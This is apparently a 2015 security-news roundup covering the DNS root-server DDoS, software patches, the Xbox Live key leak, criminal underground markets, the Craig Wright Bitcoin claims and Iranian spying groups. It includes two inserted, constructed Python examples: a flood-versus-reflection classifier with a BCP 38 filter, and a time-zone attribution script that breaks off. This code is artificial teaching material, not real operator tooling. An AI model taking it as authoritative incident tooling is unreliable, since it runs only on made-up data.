Josh Aas warns, however, that even such cooperation does not guarantee complete certainty. A change in a site's content can be faster than issuing a certificate or revoking it. Moreover, just a single page of the whole site may be problematic, he explains the scope of the whole problem. Besides, when an authority refuses to issue a certificate to such a site, it does not restrict it in any way; users simply won't see the green padlock. Users are much better protected by a modern browser, which contains anti-phishing and anti-malware techniques and does not suffer from the limitations mentioned above.

But even if one of the authorities decided to judge content strictly and decide on trustworthiness on its own, it would not solve the main problem. There is no binding methodology that the hundreds of other authorities would follow. In other words: in the end someone less responsible would issue the certificate to the suspicious site and the user would see the same green padlock. The bad guys will always be able to obtain a certificate and use it long enough to abuse users. What matters is not how good the best authority is, but how good the worst one is. It comes down to the weakest link, which is not hard to find.

HTTPS will be vitally important

According to the ISRG director, HTTPS should become the standard and just another piece of the technology puzzle, like HTTP or TCP. We are no longer in the nineties, when encryption was something extra just for banks and other “important” sites. Since then TLS has spread to every corner of the web; we find it on social networks, e-mail services, online shops, government administration and so on. In time it will become an absolute standard. Once that happens, obtaining a trusted certificate will become a vital question instead of ‘something extra’. At that point a wrong judgement of content can be very costly, warns Josh Aas.

From a technical point of view, such a mistake will lead to an outage, a risk that already exists today with HSTS. Once Wikipedia has declared that its servers must always present a valid certificate, it can no longer change that declaration. If the authorities refused for some reason to issue it another certificate, it would become unreachable for its users.

From a moral point of view, however, the authorities would find themselves in a position where they decide on freedom of speech. They would be very easy to abuse for removing inconvenient websites, simply by not issuing them the vital certificate. Mistakes (unintentional or otherwise) would in that case mean censorship, because the authorities would become gatekeepers of public expression and presence in the online world. And that is not a good role for a certification authority, explains the ISRG director.

Others will do the judging

At least initially, then, Let's Encrypt will assess the trustworthiness of sites using the Google Safe Browsing API and will refuse to issue certificates to domains that are flagged as phishing or as containing malware. The Google API is the best source of information we have, and we will try to do more than just pull information from this API.

According to ISRG, the fight against harmful sites is very important, but a certification authority should not lead that fight. Let's Encrypt is therefore implementing this check because many people do not like the idea of the authority giving up on it entirely, even though it issues only DV certificates. We would like to continue the debate before we abandon what many people consider an important task of a certification authority. Even though we disagree with it, Josh Aas concludes.

S nebezpečnými chybami se roztrhl pytel. Záplatuje Microsoft i Apple

10.12.2015 Zranitelnosti
Desítky bezpečnostních chyb ohrožují uživatele softwarových produktů od Applu i Microsoftu. Trhliny byly objeveny také v aplikaci Adobe Flash Player, kterou používají k přehrávání videí na internetu desítky miliónů lidí po celém světě. Záplaty chyb jsou však již k dispozici.
Více než pět desítek bezpečnostních chyb bylo objeveno v operačním systému OS X El Capitan. Prakticky stejné množství trhlin se ukrývá také v populární mobilní platformě iOS, kterou používají chytré telefony iPhone a počítačové tablety iPad.

Apple has already released updates for all of the security problems listed above. The same applies to several bugs discovered in other products of the American computing giant, such as Xcode, watchOS and tvOS.

Fixes were also released for more than seventy bugs in the Windows operating system. Dozens of further holes were revealed in the Internet Explorer and Microsoft Edge web browsers, but also, for example, in the Office suite.

Cyber attackers can exploit the bugs
Some of the bugs were marked as critical by their vendors. A cyber attacker can thus exploit them to run arbitrary malicious code on the compromised machine. In this way an uninvited guest that captures every keystroke can easily be smuggled onto someone else's computer, and the attacker then obtains all of the user's passwords with relative ease.

Hackers can also exploit the bugs in Flash Player. This popular online video player is the absolute record holder in the number of holes discovered: almost eighty of them were found. Fortunately, patches are already available.

Fixes for the security flaws of all three vendors can be downloaded via automatic updates; in some cases they are also available directly on the companies' websites.

Microsoft will bury the last supported version of Windows XP

10.12.2015 Threats
Microsoft officially ended support for the Windows XP operating system in April of last year. Only the so-called Embedded version remained supported. But even that is to end: the American software giant will put the definitive full stop after this ancient platform in just a few weeks, in January next year.
“Support for the MS Windows XP Embedded operating system ends in January 2016. This operating system was, and still is, used mainly in ATMs and in control computers for industrial processes,” said Pavel Bašta, security analyst at the National Security Team CSIRT, which is operated by the CZ.NIC association.

According to him, support for the Embedded version was extended mainly because it was so massively used in important sectors such as banking.

Ordinary users took advantage of this as well. “There were also unofficial procedures showing how to apply the software patches intended for XP Embedded to standard Windows XP, which allowed this operating system to survive on many weaker home PCs,” Bašta noted.

No updates
The end of support from Microsoft does not mean that this popular operating system will stop working overnight. With a bit of exaggeration, Windows XP can be called immortal. If users want it, it can keep running on their computers for decades to come.

Microsoft will not restrict the functionality itself in any way; everything will work as before. However, no updates or patches will ever be released again. That means that if a security hole appears in the system, cyber criminals will be able to exploit it easily to break into someone else's PC.

“Once the problem is directly in the operating system, it will be relatively difficult or impossible to protect against some types of attacks. With an antivirus it will be like buying a very secure front door for your house and then hiding the key under the doormat,” Lukáš Křovák, manager of the Windows Client division at Microsoft in the Czech Republic, said earlier.

It can be done for free
From a security standpoint, the appropriate solution is to move to a newer system. Users need not choose only from the Windows stable: a number of free alternatives are available to them as well.

“After this probably final nail in the coffin of what was for a long time the most popular OS, users are left only with the option of moving to more powerful hardware with a new operating system, or replacing XP with one of the open source operating systems such as GNU/Linux or BSD,” the CSIRT security analyst concluded.

Internet root servers flooded with 5 million queries a second

Two anomalous DDoS attacks have flooded the Internet root servers with more than 5 million queries a second.
Early last week, anomalous DDoS attacks threatened the Internet root servers, which received more than 5 million queries a second.

“The authoritative name servers that serve the DNS root zone, commonly known as the “root servers”, are a network of hundreds of servers in many countries around the world. They are configured in the DNS root zone as 13 named authorities, as follows.” reads the IANA website.


The Internet root servers are critical components of the global Internet infrastructure; they were targeted twice, for an hour or more each time. Multiple DNS root servers were hit in the attacks. These systems are essential for mapping domain names to IP addresses.

“On November 30, 2015 and December 1, 2015, over two separate intervals, several of the Internet Domain Name System’s root name servers received a high rate of queries. This report explains the nature and impact of the incident,” states an advisory published on Friday. “While it’s common for the root name servers to see anomalous traffic, including high query loads for varying periods of time, this event was large, noticeable via external monitoring systems, and fairly unique in nature, so this report is offered in the interests of transparency.”

The first DDoS attack occurred on Monday, November 30, and flooded the Internet root servers for about two hours and 40 minutes. The second attack took place on December 1 and lasted an hour. The majority of the Internet root servers were hit in the attacks, which flooded the machines with billions of valid queries for two undisclosed domain names, one for each attack.

Despite the significant volume of traffic that flooded the Internet root servers, Internet users did not experience any disruption, because root servers take part in name resolution only when the much larger network of intermediate DNS servers cannot answer a query themselves.

Who is behind such a powerful attack?

At the time of writing, there is no indication of who is responsible; the only certainty is that such a powerful DDoS attack requires significant computing power and bandwidth.

The name servers targeted in the attack use IP Anycast, a network routing methodology in which datagrams from a single sender are routed to the topologically nearest node in a group of potential receivers, all of which are identified by the same destination address.

The fact that the attackers hit IP Anycast servers indicates that they coordinated geographically dispersed resources.

“This event was notable for the fact that source addresses were widely and evenly distributed, while the query name was not,” continues the advisory. “This incident, therefore, is different from typical DNS amplification attacks whereby DNS name servers (including the DNS root name servers) have been used as reflection points to overwhelm some third party.”

The experts speculate that a large botnet was involved, likely composed of a huge number of IoT devices. Attacks of this kind could be prevented by implementing BCP 38, the Internet Engineering Task Force standard for defeating IP address spoofing.

NCA launches #CyberChoices campaign to stop youngsters becoming cyber criminals

Britain’s National Crime Agency (NCA) this week launched the #CyberChoices campaign, which targets parents of youngsters aged 12-15 to explain to them how easy it is to become involved in cyber criminal activities.
Are script kiddies a real threat? Britain’s National Crime Agency (NCA) thinks so, and launched a campaign to discourage teens from hacking after it found that the average age of suspects had plummeted to 17.

The decision is not unreasonable: law enforcement noticed that the average age of suspects has plummeted to 17. Hacking is becoming an attractive lifestyle, it’s cool, and a growing number of teenagers are approaching it without any perception of the consequences.

“Over the past few years the NCA has seen the people engaging in cyber crime becoming younger and younger,” said Richard Jones, head of the National Cyber Crime Unit’s Prevent team.

According to officers from the NCA, the average age of suspected cyber criminals featured in investigations involving the NCA in 2015 was 17, compared to 24 in 2014.

“We know that simply criminalizing young people cannot be the solution to this and so the campaign seeks to help motivate children to use their skills more positively,” Jones added.

“These individuals are really bright and have real potential to go on to exciting and fulfilling jobs. But by choosing the criminal path they can move from low level ‘pranking’ to higher level cyber crime quite quickly.”


The NCA has launched the #CyberChoices campaign, which targets parents of youngsters aged 12-15 to explain to them how easy it is for their children to become involved in cyber criminal activities, even without the parents’ knowledge.

The official advertisement presented by the NCA features a young boy with his family on a sofa, with the parents boasting about their son’s IT expertise.

But when the parents reveal that he joked about robbing a bank, they realize their son is a cyber criminal. The spot ends with the entire family being quizzed by officers from the NCA.

The #CyberChoices campaign was launched by the UK Government to educate parents about common forms of cyber crime; their lack of knowledge strongly shapes how they perceive their son’s activities. Malware, Distributed Denial of Service (DDoS), ransomware and the Dark Web are unknown terms for parents but not for their children, and the risk of the children becoming involved in criminal activities is high.

“The campaign aims to educate parents on the common forms of cyber crime potentially undertaken by teenagers. In an operation targeting users of Lizard Stresser, a Distributed Denial of Service (DDoS) tool which can knock websites offline by flooding them with data, all of the seven people arrested were under the age of 18,” reads the post published by the Agency.

Younger hackers have also increasingly used Remote Access Trojans (RATs), which allow them to remotely control their victims’ PCs; the agency revealed that the youngest purchaser of a RAT was just 12 years old.

“Other types of malicious software called Remote Access Trojans (RATs) can also be popular amongst younger users. They allow people to remotely monitor and take full control of another computer. During an operation targeting users of the Blackshades RAT the average age of the 22 people arrested was 18, with the youngest purchaser of Blackshades just 12 years old.”

Looking at some of the most high-profile security breaches, such as the attack against the British ISP TalkTalk and the Christmas attack against the PlayStation Network and Xbox Live conducted by the Lizard Squad hacking crew, it is possible to note that the groups were composed of young hackers, often minors …

It’s time to act!

Someone Just Tried to Take Down Internet's Backbone with 5 Million Queries/Sec
Someone just DDoSed one of the most critical organs of the Internet anatomy – The Internet's DNS Root Servers.
Early last week, a flood of as many as 5 million queries per second hit many of the Internet's DNS (Domain Name System) root servers, which act as the authoritative reference for mapping domain names to IP addresses and are 13 in total.
The attack, commonly known as Distributed Denial of Service (DDoS) attack, took place on two separate occasions.
The first DDoS attack on the Internet's backbone root servers was launched on November 30 and lasted 160 minutes (almost 3 hours); the second one started on December 1 and lasted almost an hour.
Massive Attacks Knocked Many of the 13 Root Servers Offline
The DDoS attack was able to knock 3 out of the 13 DNS root servers of the Internet offline for a couple of hours.
The request queries fired at the servers were valid DNS messages addressed towards a single domain name in the first DDoS attack, and the second day's DDoS attack addressed towards a different domain name.
According to the analysis published by the root server operators on Tuesday, each attack fired up to 5 million queries/second per DNS root name server that was enough to flood the network and cause timeouts on the B, C, G, and H root servers.
There is no indication of who or what was behind the large-scale DDoS attacks because the source IP addresses used in the attacks were very well distributed and randomized across the entire IPv4 address space.
The DDoS attacks did not cause any serious damage to the Internet, only a slight delay for some Internet users whose web browser, FTP, SSH, or other clients made DNS queries during the attacks.
This Smart Design Defends DNS Protocol Infrastructure
The motive for such attacks is still unclear, because disabling or knocking down a root server won't have a severe impact on the Internet: there are thousands of other DNS servers handling DNS queries.
"The DNS Root Name Server system functioned as [it's] designed, demonstrating overall robustness in the face of [massive] traffic floods observed at numerous DNS Root Name Servers," the Root Server Operators say (PDF), referring to the redundancy built into the DNS root system.
Like the Internet, DNS is constructed on a mesh-like structure, so if one server doesn't respond to a request, other servers step in and provide a DNS query result.
According to the DNS root server operators, the attack was not a reflective DDoS attack, in which open and misconfigured DNS resolvers are used to launch high-bandwidth DDoS attacks against a target.
Despite all the facts, any attack on the critical infrastructure of the Internet is taken extremely seriously.
The DNS root server operators recommended that Internet Service Providers (ISPs) implement Source Address Validation and BCP 38, an Internet Engineering Task Force standard that helps defeat IP address spoofing.
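As an added example for both root-server articles above (this is not code from the articles or from the root operators' advisory): the script below assumes a constructed "source-ip qname qtype" query log format, classifies a window of queries seen at an authoritative server as the single-name/many-source flood the advisory describes versus the reflection pattern it rules out, and applies the BCP 38 ingress check that the operators recommend at the network edge.

```python
"""Distinguish the root-server flood pattern from a reflection attack, and apply
a BCP 38 ingress filter. Log format and all traffic below are constructed."""
from collections import Counter
import ipaddress
import random


def parse_line(line):
    """Assumed log format (constructed): '<source-ip> <qname> <qtype>'."""
    src, qname, qtype = line.split()
    return src, qname.lower().rstrip("."), qtype


def window_stats(lines):
    """Share of the most common query name, share of the busiest source address,
    and number of distinct sources within one window of queries."""
    names, sources = Counter(), Counter()
    for line in lines:
        src, qname, _ = parse_line(line)
        names[qname] += 1
        sources[src] += 1
    total = len(lines)
    return {
        "total": total,
        "top_name_share": names.most_common(1)[0][1] / total,
        "top_source_share": sources.most_common(1)[0][1] / total,
        "distinct_sources": len(sources),
    }


def classify_window(lines, concentrated=0.9, dispersed=0.05):
    """Label a window of queries.

    'flood'      : one query name dominates while sources are widely spread
                   (the advisory's pattern: single name, well-distributed sources).
    'reflection' : one spoofed source (the victim) dominates while names vary
                   (the classic DNS amplification pattern the advisory rules out).
    'normal'     : neither concentration is present.
    """
    if not lines:
        return "normal"
    s = window_stats(lines)
    if s["top_name_share"] >= concentrated and s["top_source_share"] <= dispersed:
        return "flood"
    if s["top_source_share"] >= concentrated and s["top_name_share"] <= dispersed:
        return "reflection"
    return "normal"


def bcp38_permits(src_ip, assigned_prefixes):
    """BCP 38 ingress filtering: a packet arriving on a customer-facing link is
    forwarded only if its source lies inside a prefix assigned to that customer.
    Spoofed sources outside those prefixes are dropped at the edge."""
    ip = ipaddress.ip_address(src_ip)
    return any(ip in ipaddress.ip_network(p, strict=False) for p in assigned_prefixes)


def bcp38_filter(lines, assigned_prefixes):
    """Keep only the queries whose source address is legitimate for this edge."""
    return [l for l in lines if bcp38_permits(parse_line(l)[0], assigned_prefixes)]


def make_windows(seed=1, n=5000):
    """Constructed traffic: a flood (random sources, one name), a reflection
    window (one source, random names) and a normal window (a dozen sources)."""
    rng = random.Random(seed)

    def rand_ip():
        return str(ipaddress.IPv4Address(rng.getrandbits(32)))

    flood = [f"{rand_ip()} constructed-target.example. A" for _ in range(n)]
    reflection = [f"192.0.2.10 rnd-{i}.example. ANY" for i in range(n)]
    sources = [f"203.0.113.{i}" for i in range(1, 13)]
    names = [f"host{i}.example." for i in range(25)]
    normal = [f"{sources[i % 12]} {names[i % 25]} A" for i in range(300)]
    return flood, reflection, normal


if __name__ == "__main__":
    flood, reflection, normal = make_windows()
    for label, win in (("flood", flood), ("reflection", reflection), ("normal", normal)):
        print(f"{label:10s} -> {classify_window(win)} {window_stats(win)}")
    # An edge that only admits 203.0.113.0/24 passes the normal traffic untouched
    # and drops essentially all of the randomly sourced flood.
    edge = ["203.0.113.0/24"]
    print("normal kept:", len(bcp38_filter(normal, edge)),
          "flood kept:", len(bcp38_filter(flood, edge)))
```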

Xboxlive digital certificate exposed, opening users to MITM attacks

Microsoft has issued an advisory to notify customers that the private keys for an SSL/TLS digital certificate for * have been disclosed.
According to a security advisory published by Microsoft, the company is propagating a new certificate for the * domain because it has “inadvertently disclosed” the certificate’s contents.

Microsoft confirmed the accidental disclosure of the private keys of the digital certificate for the above domain, a circumstance that exposes customers to man-in-the-middle attacks, although the certificate “cannot be used to issue other certificates, impersonate other domains, or sign code”.

The Xboxlive certificate is included in all supported releases of Microsoft Windows.

“Microsoft is aware of an SSL/TLS digital certificate for * for which the private keys were inadvertently disclosed. The certificate could be used in attempts to perform man-in-the-middle attacks. It cannot be used to issue other certificates, impersonate other domains, or sign code. This issue affects all supported releases of Microsoft Windows. Microsoft is not currently aware of attacks related to this issue. ” reads the Microsoft advisory.

Microsoft confirmed that the revocation of the Xboxlive SSL server certificate should propagate to everybody automatically. The company hasn’t provided additional information on how many people may have seen the certificate, but it is unlikely that the accidental disclosure has been exploited in attacks in the wild.


Windows users need to do nothing, while users of Vista, Windows 7, Windows Server 2008 or Windows Server 2008 R2 will need to enable the automatic certificate updater.

Users not covered by the automatic update should add the compromised certificate to the list of untrusted certificates by using the Certificates MMC snap-in.

After applying the update, how can users verify the certificates in the Microsoft Untrusted Certificates Store?

For Windows Vista, Windows 7, Windows Server 2008, and Windows Server 2008 R2 systems that are using the automatic updater of certificate trust lists (see Microsoft Knowledge Base Article 2677070 for details), and for Windows 8, Windows 8.1, Windows RT, Windows RT 8.1, Windows Server 2012, Windows Server 2012 R2, Windows 10, and Windows 10 Version 1511 systems, users can check the Application log in the Event Viewer for an entry with the following values:

Source: CAPI2
Level: Information
Event ID: 4112
Description: Successful auto update of disallowed certificate list with effective date: Tuesday, December 1, 2015 (or later).
For systems not using the automatic updater of certificate trust lists, in the Certificates MMC snap-in, verify that the following certificate has been added to the Untrusted Certificates folder:

Issued by: Microsoft IT SSL SHA2
Thumbprint: 8b 2e 65 a5 da 17 fc cc bc de 7e f8 7b 0c 0e d5 d0 70 1f 9f

It Works! Google's Quantum Computer is '100 Million Times Faster' than a PC

Announcing the results of its experiment, Google says Quantum Computer is More than 100 Million times faster than a regular PC.
Two years ago, Google and NASA (National Aeronautics and Space Administration) bought a D-Wave 2X quantum computer, which they have been experimenting at the U.S. space agency's Ames Research Center in Mountain View, California for the past two years.
The goal is to create a better way to solve highly complex problems in seconds rather than years.
Now, Google's Quantum AI team has announced the results of its latest test on the D-Wave 2X quantum computer, demonstrating that quantum annealing can outperform simulated annealing by over 10^8 times, that is, 100,000,000 times faster.
What are quantum computers?
Quantum computers can theoretically be so much faster because they take advantage of quantum mechanics. While traditional computers use the "bits" to represent information as a 0 or a 1, quantum computers use "qubits" to represent information as a 0, 1, or both at the same time.
In turn, this allows quantum computers to reach a correct answer much faster and more efficiently through parallel processing.
Now, the Google Quantum Artificial Intelligence Lab has announced that its D-Wave machine is considerably faster than simulated annealing, the simulation of quantum computation on a classical computer chip.
"We found that for problem instances involving nearly 1000 binary variables, quantum annealing significantly outperforms its classical counterpart, simulated annealing. It is more than 10^8 times faster than simulated annealing running on a single core," said Hartmut Neven, Google's director of engineering.
Google: Our Quantum Machine is 100 Million Times Faster
Google has also published a paper [PDF] on the findings, claiming that the team was able to perform a calculation with the quantum computing technology that was significantly faster than a conventional computer with a single core processor.
The researchers emphasized that their research on quantum computing is still in the early stages and has yet to be commercialized which could take decades.
"While these results are intriguing and very encouraging, there is more work ahead to turn quantum enhanced optimization into a practical technology," Neven wrote.
The team of Google and NASA researchers also announced on Tuesday that they tested the D-Wave machine against the Quantum Monte Carlo algorithm, which simulates the optimization problem on ordinary silicon, and again the results were more than 100 million times faster than a conventional computer.

The North American cyber-criminal underground is easy to access!

According to a new report published by Trend Micro, the North American cyber criminal underground is very easy to access.
The new report released by Trend Micro reveals that the cyber criminal underground market in North America isn’t as hidden as in other countries.

“It doesn’t exist in the dark web as much as other undergrounds do, or practice as much security. Essentially, it’s become a gun show for everyone as long as they can participate and are willing to pay,” says Tom Kellermann, chief cybersecurity officer at Trend Micro.

“The North American Underground primarily caters to customers within the region–users based in the United States (US) and Canada. Unsurprisingly, most of the offerings (stolen accounts, products and services, and fake documents) are US based. This is consistent with what we see in the Japanese and Brazilian undergrounds and suggests that US-based information is most sought after in it,” states the report.

Digging into the underground markets, users can buy guns, drugs, hacking services, bulletproof vests, and even money laundering services, or perhaps hire a murderer.

This can support many different criminal activities; traditional organized criminals are becoming “cyber aware” and now do their business through the Internet.

“We’ve done studies and exposés of the most significant undergrounds in the world. The U.S. underground doesn’t practice operational security. They’ve essentially become a shopping mall.”

Of course, law enforcement is aware of this trend, and in response to increasing pressure from the authorities, more of these underground markets will probably migrate to the dark web in the future, where they would be better protected.

In the 2000s, law enforcement agencies were doing very well, and almost every U.S. cyber-criminal underground was dismantled, but in the last 3 years the criminal underground market has made a comeback and is getting stronger.

“It’s larger because it’s providing a wider multiplicity of goods and services. They’re there for the drugs, weapons, passports, stolen cards, and murder for hire.”

Looking at the numbers, drugs are the most popular item in the criminal underground ecosystem, accounting for 62% of the market, but it is also interesting to see that stolen data dumps account for 16%, fake documents 4%, weapons 2%, and murder for hire 1%.


In terms of “murder for hire“, you have some options available like a simple beating for $3,000, or an “accidental death” for $900,000.

The last category not yet covered is crimeware, which takes 15% of the market and includes things like buying malware and hacking services.

The other best seller besides drugs is malware, and the malware service provider does his homework, re-encrypting the malware as many times as needed until it passes through endpoint products undetected.

“It’s why targeted attacks have become so prevalent. They will make sure their attacks cannot be stopped by perimeter defenses.”


Talking about differences between countries, Kellermann explains:

“In the Russian or Chinese underground, they won’t sell you the back door into the system. That’s a North American phenomenon. It’s like, I broke into a house last night, I made a duplicate of the key. You want it, you got it.”

One of the main reasons we now read about the cyber criminal underground in the news is that carrying out illegal activities in cyberspace is becoming ever easier and cheaper.

The sales model known as crime-as-a-service is attracting organized crime and is enabling rapid growth of illegal activities online.

Is he Satoshi Nakamoto? Australian Police raid home of the alleged Bitcoin father

While the media announced that they had found the real identity of the Bitcoin creator Satoshi Nakamoto, Australian police raided his home in Sydney.
A few hours after the media identified the Australian expert Craig Steven Wright as the possible man behind the name Satoshi Nakamoto, the anonymous creator of Bitcoin, the Australian Police raided his home in Sydney.

Wright was identified as the mysterious creator of Bitcoin, Satoshi Nakamoto, based on leaked transcripts of legal interviews and a number of emails and blog posts.

At the time of writing, there is no confirmation of the identity of the Bitcoin creator. A dozen police officers raided Wright’s home on Wednesday afternoon; they broke down the door and searched the house.

It is important to clarify that the raid does not appear to be associated with the recent revelation of Satoshi Nakamoto’s real identity; the Guardian, which reported the news, states that the operation is linked to an Australian Taxation Office investigation.

“On Wednesday afternoon, police gained entry to a home belonging to Craig Wright, who had hours earlier been identified in investigations by Gizmodo and Wired, based on leaked transcripts of legal interviews and files. Both publications have indicated that they believe Wright to have been involved in the creation of the cryptocurrency.” reported the Guardian.


The Australian Federal police issued an official statement explaining that the raids were not related to the bitcoin claims.

“The AFP can confirm it has conducted search warrants to assist the Australian Taxation Office at a residence in Gordon and a business premises in Ryde, Sydney. This matter is unrelated to recent media reporting regarding the digital currency bitcoin.”

One officer told Reuters they were “clearing the house”; Reuters also reported that Wright’s offices had been raided as well.

The emails cited by Gizmodo don’t state that Wright is a founder of Bitcoin; instead, they suggest his involvement in the development of the cryptocurrency. Wright was trying to persuade the Australian Taxation Office to tax his Bitcoin holdings as a currency and not as an asset.
Another thing that makes experts suspicious is that Nakamoto reportedly has some 1.1 million Bitcoins to his name in a trust fund, amounting to roughly $455 million, which is exactly the amount that Wright is believed to own.

“An email to a Clayton Utz lawyer identified as Wright’s lawyer in the ATO transcripts was sent from an address linked to Nakamoto and is signed ‘Craig (possibly).’ The email discussed whether contact should be made with Australia’s then assistant treasurer Arthur Sinodinos in January 2014 over the regulatory issues in Australia surrounding bitcoin,” continues the Guardian.

“The treatment of bitcoin for tax purposes in Australia has been the subject of considerable debate. The ATO ruled in December 2014 that cryptocurrency should be considered an asset for capital gains tax purposes.”

The Australian Taxation Office will continue its investigation, which will surely clarify whether Wright is the mysterious Satoshi Nakamoto or the wrong person.

Chrome for Android will block fraudulent sites

9.12.2015 Mobile
If you have ever seen that scary red screen in Google Chrome that stops you from visiting dangerous websites, and you would like a similar feature on your mobile phone, you are in luck: Google is extending its Safe Browsing technology to Android as well.

Safe Browsing is now integrated into Google Play services, and applications downloaded from the online store will be able to use it. Chrome for Android will be the first to incorporate it.

In the PC version of Chrome, Safe Browsing protects you from sites known to contain malware, viruses or online scams. If you are a regular user of the mobile Internet, your browser is probably constantly flooding you with warnings that your phone is not working properly, that the battery is draining too fast or that the device is not secured. All of these warnings are trying to get you to install an application that supposedly fixes these problems.

Although Chrome for Android, unlike its desktop version, does not support extensions, which means it offers no ad blocking, users will hopefully at least be able to count on getting rid of deceptive ads and dangerous sites.

According to Google, implementing Safe Browsing was not easy. Mobile data has limited bandwidth, especially in some parts of the world. The list of unwanted sites in the application is therefore always kept as up to date and as compact as possible.

“A large share of the attacks happen only in selected parts of the world, so we send the information that protects the affected devices only to the regions where they are located,” Google said on its blog. “We also try to send information about the most dangerous sites first.”

According to its development team, Safe Browsing should also consume as little processor capacity and mobile memory as possible, which should save battery. Users of mobile phones with the Android operating system can check whether their device has the Safe Browsing service in the privacy settings.

Bitcoin Creator 'Satoshi Nakamoto' Unmasked! An Australian Man 'Craig Wright' identified...
Breaking Update: Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney.
Yes, Satoshi Nakamoto, the mysterious creator of the Bitcoin digital cryptocurrency has possibly been identified as an Australian entrepreneur, according to investigations independently done by Wired and Gizmodo.
His name is Craig Steven Wright… at least based on some convincing evidence shown by both publications.
Bitcoin is a revolutionary virtual currency developed around Blockchain, a complicated cryptographic protocol and a global computers network that oversees and verifies which Bitcoins have been spent by whom.
The identity of those spending Bitcoins is extremely difficult to trace because of the currency's anonymous nature; it is therefore very popular among criminals.
Satoshi Nakamoto is not only the father of an entire economy worth Billions of dollars, but also a multi-multi-millionaire himself.
Some Evidence that... Satoshi Nakamoto = Craig Steven Wright
The 44-year-old Australian academic – described as a "climate-change denier, a serial entrepreneur and an eccentric" – fits the profile of Bitcoin's creator in nearly every detail.
Wired claimed that Wright knew about Bitcoin before it was ever made public in 2009, based on the following evidence:
Wright apparently published some blog posts sharing and seeking expertise on developing cryptocurrencies just before the launch of Bitcoin.
His PGP keys for email were previously linked to someone identifying themselves as Satoshi Nakamoto.
He published a blog post announcing the launch of Bitcoin, which was then deleted and replaced with a short note saying "the best way to hide is right in the open."
The documents that were either "leaked" or "hacked" by an anonymous source close to Wright include e-mails dating back to 2008, before the creation of Bitcoin, in which Wright discusses his work on Bitcoin.
Wright has 1.1 Million Bitcoins Worth $400 Million
As evidence, the report cites a legal contract showing that Mr. Wright and his American business partner, Dave Kleiman (a computer forensics expert who died in 2013), were involved in the development of the Bitcoin digital currency.
According to the contract, Wright and Kleiman allegedly have access to 1.1 million Bitcoins. This sum, worth about $400 million today, is the same amount that Nakamoto is believed to own.
Leaked Conversation b/w Wright and his Lawyer
Another leaked document shows conversations between Wright and his lawyers in which Wright said:
"I did my best to try and hide the fact that I have been running Bitcoin since 2009;" however "by the end of this I think half the world is going to bloody know."
Shortly after Wired published its report, Wright's blog was taken offline and his Twitter account was deleted altogether.
Wright's Ex-Wife Knew his Research on Digital Money
The Gizmodo story includes interviews with Wright's ex-wife Lynn, who confirmed that her husband worked on digital currency ideas many years ago, but noted that he 'didn’t call it Bitcoin' at first.
Another reporter approached his current wife, who is a director at his company DeMorgan, and asked whether Wright was the inventor of Bitcoin. Guess what?
She smiled and closed the door, declining to comment.
Wright Announced World's First Bitcoin Bank
Wright publicly announced last year his plans to establish the "World's First Bitcoin Bank" and described himself as CEO of the DeMorgan company.
DeMorgan is a company "focused on alternative currency, next generation banking and educational products with a focus on security and creating a simple user experience."
However, evidence can go wrong. Various attempts to prove Satoshi Nakamoto's identity in the past have proved unsuccessful.
Last year, Newsweek made headlines worldwide by claiming to have "outed" the creator of Bitcoin, 'Satoshi', as a 64-year-old Japanese-American who lives near Los Angeles.
However, Wright's name had never before appeared on the lists of possible creators of Bitcoin. So this time as well, the whole story could be nothing but a big hoax, and the unverified leaked documents could also be faked in whole or in part.

Police Raid alleged Bitcoin Creator Craig Wright's Home in Sydney
Just hours after the Australian man Craig Steven Wright was outed as the possible real identity of Satoshi Nakamoto, the anonymous creator of Bitcoin, Australian police raided his home in Sydney.
Over 10 police officers raided Wright's home in the Sydney suburbs on Wednesday afternoon. They forcefully opened the door, and 'started searching the cupboards and surfaces of the garage.'
However, the Sydney police raid at Wright's home is not associated with the claims about his involvement in creating Bitcoin; rather, it is related to an Australian Taxation Office investigation, the Guardian reported.
Wright was recently identified as the mysterious creator of Bitcoin, based on leaked transcripts of legal interviews and a number of emails and blog posts.
However, neither Dr. Wright nor anyone else has publicly confirmed the real identity of the founder of Bitcoin Satoshi Nakamoto.
In a statement, the Australian Federal Police (AFP) said the raids were not associated with the recent Bitcoin claims about Wright.
"The AFP can confirm it has conducted search warrants to assist the Australian Taxation Office at a residence in Gordon and a business premises in Ryde, Sydney," the police said. "This matter is unrelated to recent media reporting regarding the digital currency bitcoin."
Wright appears to be trying to persuade the Australian Taxation Office to tax his Bitcoin holdings as a currency rather than as an asset.

Nakamoto reportedly has some 1.1 Million Bitcoins to his name in a trust fund that amounts to roughly 455 Million in US Dollars — the same amount that Wright is believed to own.
The recent investigations hinted at a direct link between Wright and Nakamoto, but the evidence could be fake in whole or part and there is a possibility that Wright could also be the wrong man.
Maybe the Australian Taxation Office will have better luck in figuring out the mystery — the face behind Bitcoin.

Cadelle and Chafer, Iranian hackers are tracking dissidents and activists

Symantec has uncovered Cadelle and Chafer groups, two Iran-based hacking teams that are tracking dissidents and activists.
According to a new report published by Symantec, Iranian hackers have been using malware to track individuals, including Iranian activists and dissidents.

The researchers identified two groups of Iran-based hackers, dubbed Cadelle and Chafer, which have been distributing data-stealing malware since at least mid-2014. The experts uncovered the command-and-control servers and explained that registration details indicate the Iranian hackers may have been operating since 2011.

There are a number of indicators that suggest both groups are based in Iran: the Cadelle and Chafer teams are most active during daytime hours in Iran's time zone and primarily operate during Iran's business week (Saturday through Thursday).
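The working-hours heuristic used in the attribution above can be reproduced over any set of attacker-side timestamps. The script below is an added example, not Symantec's tooling: the events are constructed, the two candidate offsets are fixed December (standard-time) values without DST handling, and the 09:00–17:59 working window is an assumption.

```python
"""Score candidate time zones and business weeks against attacker activity timestamps.

Added example (not Symantec's code).  The event list is constructed, not real
C&C data, and the UTC offsets are fixed winter offsets without DST handling.
"""
from datetime import datetime, timedelta, timezone

# Constructed sample: UTC timestamps of attacker-side events such as C&C
# check-ins or sample compile times (5 December 2015 is a Saturday).
SAMPLE_EVENTS_UTC = [
    "2015-12-05T05:30:00Z",  # Sat 09:00 Tehran / Sat 06:30 Berlin
    "2015-12-06T07:00:00Z",  # Sun 10:30 Tehran / Sun 08:00 Berlin
    "2015-12-07T10:15:00Z",  # Mon 13:45 Tehran / Mon 11:15 Berlin
    "2015-12-08T05:45:00Z",  # Tue 09:15 Tehran / Tue 06:45 Berlin
    "2015-12-09T12:00:00Z",  # Wed 15:30 Tehran / Wed 13:00 Berlin
    "2015-12-09T19:00:00Z",  # Wed 22:30 Tehran / Wed 20:00 Berlin (off hours)
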